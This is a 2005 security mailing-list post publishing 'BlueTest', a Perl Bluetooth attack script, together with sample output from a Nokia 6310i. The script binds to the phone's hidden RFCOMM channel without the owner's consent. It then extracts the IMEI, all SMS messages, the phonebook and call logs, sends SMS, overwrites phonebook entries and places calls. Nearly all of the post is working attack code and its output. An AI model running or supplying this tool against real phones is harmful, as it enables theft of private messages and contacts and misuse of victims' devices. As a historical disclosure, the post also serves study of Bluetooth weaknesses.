[TOOL] BlueTest - Bluetooth Scanner

From: SecuriTeam (support_at_securiteam.com)
Date: 07/18/05

  • Next message: SecuriTeam: "[NT] MailEnable STATUS Command Buffer Overflow"
    To: list@securiteam.com
    Date: 18 Jul 2005 17:20:26 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      BlueTest - Bluetooth Scanner
    ------------------------------------------------------------------------

    SUMMARY

    DETAILS

    Kroma Pierre wrote a tool that can scan
    <http://en.wikipedia.org/wiki/Bluetooth> Bluetooth devices:

    What can it do?
    1. Search devices
    2. Ping a device (optional)
    3. Bind a device (ex. 6310i)
    4. Extract device information
    5. Extract/manipulate phonebook entries
    6. Extract/manipulate SMS entries (Only Nokia 6310i is supported)
    7. Extract dialed numbers, missed calls, received calls
    8. Make a call (hangup after 20 sec.)

    What do you need to run it?
    1. Mobile device/phone (example: 6310i)
    2. Perl +
    Device::Gsm;Getopt::Std;Term::ReadLine;Device::Modem;Term::ANSIColor
    3. Bluetooth adapter (example: linksyss usbbt100)
    4. Start the script as root (you need root to bind a device at
    /dev/rfcomm0)

    Tool:
    #!/usr/bin/perl
    #
    # bluetooth hacking tool
    #
    # written by pierre kroma
    # kroma@syss.de

    use Device::Gsm;
    use Getopt::Std;
    use Term::ReadLine;
    use Device::Modem;
    use Term::ANSIColor;

    ############## U S A G E ##################
    getopts("bcpsv", \%args);

    system ("clear");
    print "\nBluetooth Pentester\n";
    print "written by pierre kroma (kroma\@syss.de)\n\n";

    if (!defined $args{s}) {
    print qq~
    Usage: perl bluetest.pl -s { -b <bt-addr> -c channel -p -v }
            -b <bt-addr> = hardware address of the target bluetooth device
    (example: 00:11:22:33:44:55)
            -c <channel> = channel
     -p = ping the remote device
     -s = start the script
            -v = be verbose

    ~; exit;}

    ################# D E F I N I T I O N ##########
    # tools
    my $hcitool="/usr/bin/hcitool";
    my $l2ping ="/usr/bin/l2ping";
    my $rfcomm ="/usr/bin/rfcomm";
    my $lsusb = "/usr/sbin/lsusb";
    my $hciconfig = "/usr/sbin/hciconfig";
    my $bluefw = "/sbin/bluefw";

    # variable
    my $bluedev="hci0";
    my $bt_addr = 0;
    my $channel = $args{c};
    my $i = 0;

    ########## S U B R O U T I N E S #################

    sub init_adapter
    {
     use strict;

     my $busnum = "";
     my $devnum = "";
     # busid 0a12:0001 = linksys USBBT100 usb bluetooth stick
     my $id = `$lsusb 2>/dev/null |grep 0a12:0001`;
     # more generic
     # my $id = `$lsusb 2>/dev/null |grep -i bluetooth`;

     if ( $id =~ /Bus (\d{3}) Device (\d{3}): ID 0a12:0001/ )
     {
      $busnum = $1;
      $devnum = $2;
      system("$bluefw usb $busnum\/$devnum");
      system("$hciconfig $bluedev up");
      sleep(1.5);
     }
    }

    sub init_modem
    {
     $modem = new Device::Modem( port => '/dev/rfcomm0' );
     if( $modem->connect( baudrate => 9600 ) ) {
            # print "connected!\n";
       } else {
            print "sorry, cannot connect to your serial port!\n";
       }
     # turn off the local echo
     $modem->echo(0);
    }

    sub searching
    {
     print color 'bold blue';
     print "search devices\n";
     print color 'reset';
     my @scan = `$hcitool scan | grep -v "Scanning"`;
     foreach $line (@scan)
     {
      print $i++;
      print $line;
     }
     print "\n";
    }

    sub selecting
    {
     # select a device
     if($args{'b'})
     {
      $bt_addr = $args{b};
     }
     else
     {
      $term = new Term::ReadLine 'bluetooth address reader';
      my $prompt = "Enter hw-addr (example: 00:11:22:33:44:55): ";
      my $OUT = $term->OUT || \*STDOUT;
      $bt_addr = $term->readline($prompt);
     }
    }

    sub ping
    {
     # ping the remote device
     if($args{'p'})
     {
         # ping the remote device
         print color 'bold blue';
         print "\nping the remote device $bt_addr\n";
         print color 'reset';
         die "You must be root to use l2ping!\n" if $> != 0;
         system ("$l2ping -c 5 $bt_addr");
     }
    }

    sub binding
    {
     # binding a device
     print color 'bold blue';
     print "\n\nbind a device to $bt_addr \t\t";
     print color 'reset';
     if($args{'c'})
     {
      $channel = $args{c};
     }
     else
     {
      # setting default nokia 6310i hidden channel 17 or 18
      $channel = 17;
     }

     system("$rfcomm release $bluedev 2>/dev/null");
     sleep(2);
     system("$rfcomm bind $bluedev $bt_addr $channel 2>/dev/null");
     sleep(2);

     # Connect to the mobile phone
     # for devfs
     # my $gsm = new Device::Gsm( port => '/dev/bluetooth/rfcomm/0' );

     # for udev
     $gsm = new Device::Gsm( port => '/dev/rfcomm0' );

       if( $gsm->connect() )
     {
      print color 'bold green';
            print "connected!\n";
      print color 'reset';
       }
     else
     {
      print color 'bold red';
            print "sorry, no connection with gsm phone on serial port!\n";
      print color 'reset';
      exit (1);
       }

     # Register to GSM network
     $gsm->register();
    }

    sub manu
    {
     # Extract the manufacturer
     my $man_name = $gsm->manufacturer();
     print "manufacture: $man_name \n";
    }

    sub model
    {
     # model
     my $model = $gsm->model();
     print "model: $model \n";
    }

    sub sw
    {
     # software revision
     $modem->atsend( 'AT+CGMR' . Device::Modem::CR );
       $rev = $modem->answer();
     $rev =~ s/\r//g;
     $rev =~ s/OK//g;
     print "software revision: \n \n $rev";
     sleep(1);
    }

    sub imei
    {
     # Extract the IMEI number
     my $imei = $gsm->imei();
     $imei =~ s/\r//g;
     $imei =~ s/OK//g;
     print "IMEI: (International Mobile Equipment Identifier) = $imei \n\n";
    }

    sub readbook
    {
     print color 'bold blue';
     print "\n\nextract the phonebook\n\n";
     print color 'reset';
     if($args{'v'})
     {
     print "storagelocation:";
     print qq~
    ME => storage: device
    SM => storage: SIM-card
    MT => combination of ME + SM (doesn t work FOR MY 6310i)
    BM => storage: CB-news
     ~;
     }
      
     print "\nsupported storage location";
     $modem->atsend( 'AT+CPMS=?' . Device::Modem::CR );
       $types = $modem->answer();
     $types =~ s/\r//g;
            $types =~ s/\n//g;
     $types =~ s/OK//g;
     $types =~ s/\+CPMS//g;
     print "$types \n";
     
     print "\ncurrent phonebooksource";
     $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
       $source = $modem->answer();
     $source =~ s/\r//g;
            $source =~ s/\n//g;
     $source =~ s/OK//g;
     $source =~ s/\+CPBS//g;
     print $source;
     print "\n\n";

     print "\ncurrent used storage on device";
     $command="AT+CPBS=\"ME\"";
     $modem->atsend( $command . Device::Modem::CR );
     $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
       $memory = $modem->answer();
     $memory =~ s/\r//g;
            $memory =~ s/\n//g;
     $memory =~ s/OK//g;
     $memory =~ s/\+CPBS//g;
     print $memory;

     print "\ncurrent used storage on SIM";
     $command="AT+CPBS=\"SM\"";
     $modem->atsend( $command . Device::Modem::CR );
     $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
       $source = $modem->answer();
     $source =~ s/\r//g;
            $source =~ s/\n//g;
     $source =~ s/OK//g;
     $source =~ s/\+CPBS//g;
     print $source;
     print "\n\n";

     my $prompt = "What do you want to readout? (ME oder SM) : ";
     my $OUT = $term->OUT || \*STDOUT;
     $type = $term->readline($prompt);

     $command = "AT+CPBS=\"$type\"";
     $modem->atsend( $command . Device::Modem::CR );
       $asource = $modem->answer();
     $asource =~ s/\r//g;
            $asource =~ s/\n//g;
     $asource =~ s/OK//g;
     print $asource;

     my $prompt = "starting from entry (>=0): \t ";
     my $OUT = $term->OUT || \*STDOUT;
     $start = $term->readline($prompt);
     print "\n";
     my $prompt = "ending to entry:\t\t";
     my $OUT = $term->OUT || \*STDOUT;
     $max = $term->readline($prompt);
     print "\n";

     if ( $start > $max || $start <= '0' )
     {
      print "oops damn f*cking long night? \n";
      print "initial value <= 0? \n";
      print "or initial value > final value? \n";
      exit (1);
     }
     list_entries ();

     print "\nextract last 5 dialled numbers: \n";
     $command = "AT+CPBS=\"DC\"";
     $modem->atsend( $command . Device::Modem::CR );
       $asource = $modem->answer();
     $asource =~ s/\r//g;
            $asource =~ s/\n//g;
     $asource =~ s/OK//g;
     print $asource;
     $start=1;
     $max=5;
     list_entries ();

     print "\nlast 5 missed calls: \n";
     $command = "AT+CPBS=\"MC\"";
     $modem->atsend( $command . Device::Modem::CR );
       $asource = $modem->answer();
     $asource =~ s/\r//g;
            $asource =~ s/\n//g;
     $asource =~ s/OK//g;
     print $asource;
     $start=1;
     $max=5;
     list_entries ();

     print "\nlast 5 received calls: \n";
     $command = "AT+CPBS=\"RC\"";
     $modem->atsend( $command . Device::Modem::CR );
       $asource = $modem->answer();
     $asource =~ s/\r//g;
            $asource =~ s/\n//g;
     $asource =~ s/OK//g;
     print $asource;
     $start=1;
     $max=5;
     list_entries ();
    }

    sub list_entries
    {
     $i = $start;
     foreach $i ( $start..$max )
     {
      $command = "AT+CPBR=$i";
      $modem->atsend( $command . Device::Modem::CR );
      $entry = $modem->answer();

      # format
      $entry =~ s/\r//g;
             $entry =~ s/\n//g;
      $entry =~ s/OK//g;

      # parse
      # type = 145 = international format = number starts with +
      # type = 129 = unknown number format = didn't start with +

             ( $pos, $num, $type, $tag ) = $entry =~ m/^\+CPBR:
    ($i),"(.+?)",(\d+),"(.+)?"\r?$/m;

      $type =~ s/145/international/g;
      $type =~ s/129/unknown/g;
     
      if ( $num == '' )
      {
       print "entry $i: is empty \n";
      }
      else
      {
       print "entry $i: $num, $type, $tag \n";
       
      }
     }
    }

    sub sendsms
    {
     # Send a text message quickly
     print color 'bold blue';
     print "\n\nwrite a message (SMS)\n";
     print color 'reset';
     print "\n";
     my $prompt = "recipient (example +4912345678): ";
     my $OUT = $term->OUT || \*STDOUT;
     $recipient = $term->readline($prompt);
     print "\n";

     my $prompt = "message: ";
     my $OUT = $term->OUT || \*STDOUT;
     $message = $term->readline($prompt);

     my $status = $gsm->send_sms(
              recipient => $recipient,
              content => $message
        );
     if ( $status )
     {
      print color 'bold green';
      print "\nmessage transmitted successfully.\n";
      print color 'reset';
     }
     else
     {
      print color 'bold red';
      print "\nERROR: message couldn`t delivered.\n" ;
      print color 'reset';
     }
     sleep(2);
    }

    sub readsms
    {
     # Get list of device::Gsm::Sms message objects
     # see `examples/read_messages.pl' for all details
     
     # get mode status
     $modem->atsend( 'AT+CMGF?' . Device::Modem::CR );
     print color 'bold blue';
     print "\nSMS Menu";
     print color 'reset';
     print "\n \ncurrent sms status (0=PDU, 1=text)";
       my $status = $modem->answer();
     $status =~ s/\r//g;
            $status =~ s/\n//g;
     $status =~ s/OK//g;
     $status =~ s/\+CMGF//g;
     print $status;
     sleep(2);
     
     # switch to text mode (does not work with 6310i)
     # print "switch to text mode \n";
     # $modem->atsend( 'AT+CMGF=1' . Device::Modem::CR );
       # print $modem->answer();

     print "\n\nextract all sms \n";
     $modem->atsend( 'AT+CMGL=4' . Device::Modem::CR );
       my $extract = $modem->answer();
     $extract =~ s/OK//g;
     $extract =~ s/\+CMGL://g;
     sleep(2);
     print $extract;
     
    }

    sub call
    {
     # read number
     print color 'bold blue';
     print "\n\nmaking a call\n";
     print color 'reset';
     print "\n";
     my $prompt = "Which number should be called? (example: 004970714078560):
    ";
     my $OUT = $term->OUT || \*STDOUT;
     $number = $term->readline($prompt);
     print "\ncalling $number \n";
     my $max = 20;
     if (fork)
     {
      $modem->dial( $number );
     }
     else
     {
      print "waiting $max seconds before ring off: ";
      $i = 0;
      foreach $i ( 1..$max )
      {
       print "$i ";
       sleep(1);
      }
      print "\n";
      $modem->hangup();
     }
    }

    sub writebook
    {
     print color 'bold blue';
     print "\ncreate a phonebook entry";
     print color 'reset';
     print "\n";
     my $prompt = "storage space number (ATTENTION: you may overwrite an
    existing entry:): ";
     my $OUT = $term->OUT || \*STDOUT;
     $nr = $term->readline($prompt);
     print "\n";
     my $prompt = "phone-number (format +49123456789): ";
     my $OUT = $term->OUT || \*STDOUT;
     $tel = $term->readline($prompt);
     print "\n";
     my $prompt = "name: ";
     my $OUT = $term->OUT || \*STDOUT;
     $name = $term->readline($prompt);
     print "\n";
     my $prompt = "storage location (ME=device, SM=SIM): ";
     my $OUT = $term->OUT || \*STDOUT;
     $place = $term->readline($prompt);

     $command="AT+CPBS=\"$place\"";
     $modem->atsend( $command . Device::Modem::CR );

     $command="AT+CPBW=$nr,\"$tel\",145,\"$name\"";
     $modem->atsend( $command . Device::Modem::CR );
       $source = $modem->answer();
     $source =~ s/\r//g;
            $source =~ s/\n//g;
     $source =~ s/OK//g;
     print $source;

     print "\n\nchecking......";
     $start = $nr - 5;
     $max = 5;
     if ( $start <= 0 )
     {
      $start = $nr;
     }
     $max = $nr + 5;
     print "\n extract your phonebook from storage space number $start to $max
    \n";
     list_entries ();
     print "\n";
    }

    sub key
    {
     my $message = "- press any key -";
     my $OUT = $term->OUT || \*STDOUT;
     $term->readline($message);
    }

    sub final
    {
     #system ('cat ./logo.txt');
     print color 'bold red';
     print "\t\t\t\twritten by pierre kroma (kroma\@syss.de)\n\n";
     print color 'reset';
     $modem->disconnect();
     print "\n";
    }
     

    ############### M A I N ################

    init_adapter ();
    searching ();
    selecting ();
    ping ();
    binding ();
    init_modem ();
    print color 'bold blue';
    print "\nextract device information\n";
    print color 'reset';
    manu ();
    model ();
    sw ();
    imei ();
    key();
    readsms ();
    sendsms ();
    key ();
    readbook ();
    writebook ();
    key ();
    call ();
    key ();
    final ();

    Example results:
    ###
    # test: #
    ###

    Bluetooth Pentester
    written by pierre kroma (kroma@syss.de)

    search devices
    0 00:60:57:XX:XX:XX Exploit

    Enter hw-addr (example: 00:11:22:33:44:55): 00:60:57:XX:XX:XX

    bind a device to 00:60:57:XX:XX:XX connected!

    extract device information
    manufacture: Nokia
    model: Nokia 6310i
    software revision:
     
     V 5.51
    08-07-03
    NPL-1
    (c) NMP.

    IMEI: (International Mobile Equipment Identifier) = XXXXXXXXXXXXXXXX

    - press any key -

    SMS Menu
     
    current sms status (0=PDU, 1=text): 0

    extract all sms
     1,1,,159
    0791971 ----------- c u t ---------------- ( ;-) )

    write a message (SMS)

    recipient (example +4912345678): +491727777777
    message: SMILE

    message transmitted successfully.

    extract the phonebook

    supported storage location: ("ME","SM"),("ME","SM"),("MT")

    current phonebooksource: "SM",16,100

    current used storage on device: "ME",9,500
    current used storage on SIM: "SM",16,100

    What do you want to readout? (ME oder SM) : SM
    starting from entry (>=0): 18
    ending to entry: 30

    entry 18: is empty
    entry 19: is empty
    entry 20: +49110, international, SySS-Hotline
    entry 21: +4917222442, international, D2-Blumengruss
    entry 22: +4917222334, international, D2-Events
    entry 23: +4911880, international, Telefonauskunft
    entry 24: +4917222333, international, D2-Hotelservice
    entry 25: 22444, unknown, D2-Wetterinfo
    entry 26: 222222, unknown, D2-ADAC Pannenhilf
    entry 27: +4917222330, international, D2-Reiseservice
    entry 28: 22666, unknown, D2-PassoVoice
    entry 29: 22922, unknown, D2-Konto-Server
    entry 30: 22933, unknown, D2-HandyBrse

    extract last 5 dialled numbers:
    entry 1: 012334566, unknown,
    entry 2: 0123454566, unknown,
    entry 3: 09345739857, unknown,
    entry 4: 09287429184, unknown,
    entry 5: +49123456789, international,

    last 5 missed calls:
    entry 1: +49110, international,
    entry 2: +4919222, international,
    entry 3: +49112, international,
    entry 4: is empty
    entry 5: is empty

    last 5 received calls:
    entry 1: is empty
    entry 2: +4970714078560, international,
    entry 3: +4900001111111, international,
    entry 4: +4911111111111, international,
    entry 5: +49123456789, international,

    create a phonebook entry
    storage space number (ATTENTION: you may overwrite an existing entry:): 19
    phone-number (format +49123456789): +49666666
    name: Callgirl

    storage location (ME=device, SM=SIM): SM

    checking......
     extract your phonebook from storage space number 14 to 24
    entry 14: is empty
    entry 15: is empty
    entry 16: is empty
    entry 17: is empty
    entry 18: is empty
    entry 19: +49666666, international, Callgirl
    entry 20: +49110, international, SySS-Hotline
    entry 21: +4917222442, international, D2-Blumengruss
    entry 22: +4917222334, international, D2-Events
    entry 23: +4911880, international, Telefonauskunft
    entry 24: +4917222333, international, D2-Hotelservice

    making a call
    Which number should be called? (example: 004970714078560): 004970714078560
    calling 004970714078560
    waiting 20 seconds before ring off: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
    17 18 19 20

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:kroma@syss.de> Kroma Pierre.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] MailEnable STATUS Command Buffer Overflow"

    Relevant Pages

    • Re: Field validation does not kick in
      ... I only just require to check and increment the if there is another ... I generally use the forms BeforeUpdate event to trap for data entry errors. ... This event fires before the data is actually written, and has a Cancel ... Private Sub Form_BeforeUpdate ...
      (microsoft.public.access.formscoding)
    • Re: Using Validation to force entry into cells?
      ... Uh oh...I run into a problem now with every copy of this worksheet. ... Private Sub Worksheet_Change ... > Option Explicit ... >> entry into this column in our form. ...
      (microsoft.public.excel.misc)
    • Re: Creating a New Record in Sub Form_Current
      ... any attempt to use Form_Current to force the entry of a new record is ... > required to determine whether the first record is already complete. ... > code is run in Sub Form_Open or Sub Form_Load. ... This conditional interlocking generally works well. ...
      (microsoft.public.access.forms)
    • Re: event fire
      ... 'J' is entered Then to subtract 10.00 from entry and copy the entrys in cells ... Private Sub Workbook_SheetChange ... Dim dblValue As Double ... Dim varTargetAmt As Variant ...
      (microsoft.public.excel.programming)
    • Entry.cs // A common EntryPoint for a project.
      ... /// Main Entry Point. ... Public Sub New ... excel workbook, sheet. ... microsoft Excel object lib 9, 10, 11, etc via the Project Add Reference ...
      (microsoft.public.dotnet.languages.csharp)